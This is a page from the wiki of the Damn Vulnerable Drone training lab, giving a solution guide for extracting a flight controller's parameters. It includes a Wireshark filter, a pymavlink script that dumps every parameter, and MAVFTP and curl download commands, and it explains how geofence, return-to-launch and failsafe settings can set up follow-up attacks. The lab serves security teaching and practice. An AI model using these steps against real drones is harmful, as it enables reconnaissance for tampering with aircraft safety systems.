Parameter Extraction - nicholasaleks/Damn-Vulnerable-Drone GitHub Wiki
Extracting flight controller parameters via MAVLink or MAVFTP for reconnaissance or offline tampering.
Damn Vulnerable Drone > Attack Scenarios > Exfiltration > Parameter Extraction
The flight controller stores all its runtime configuration in a parameter table, including failsafe triggers, flight mode settings, sensor calibration, geofence data, and more. These parameters can be exfiltrated via MAVLink messages or via file download (e.g., MAVFTP) without needing to modify or control the drone's flight behavior.
This attack allows an adversary to perform detailed offline analysis of how the drone is configured — and use this intel to craft precise follow-up exploits (e.g., override RTL behavior, disable geofence, mislead operators).
⚠️ Solution Guide
If you're already eavesdropping on a telemetry link (e.g., using Wireshark), listen for PARAM_VALUE messages. These are broadcast in response to parameter list requests.
Filter in Wireshark:
mavlink.message.name == "PARAM_VALUE"
Log all observed parameter names and values.
Create a Python script to request and receive all parameters:
from pymavlink import mavutil
master = mavutil.mavlink_connection('tcp:10.13.0.3:5760')
master.wait_heartbeat()
print("[+] Connected")
master.mav.param_request_list_send(
master.target_system,
master.target_component
)
while True:
msg = master.recv_match(type='PARAM_VALUE', blocking=True)
print(f"{msg.param_id.decode('utf-8')}: {msg.param_value}")
This will dump all active parameter values to stdout.
Use MAVProxy’s mavftp module or direct curl access to download:
module load mavftp
get /APM/Parameters.parm
Or retrieve it via browser or curl if exposed:
curl http://localhost:3000/download/parameters
| Parameter | Description |
|---|---|
FENCE_ENABLE |
Whether geofencing is enabled |
RTL_ALT |
Return-to-launch altitude |
ARMING_CHECK |
Sensor arming validation flags |
GPS_AUTO_SWITCH |
GPS failover behavior |
GCS_FAILSAFE |
Whether GCS loss triggers failsafe |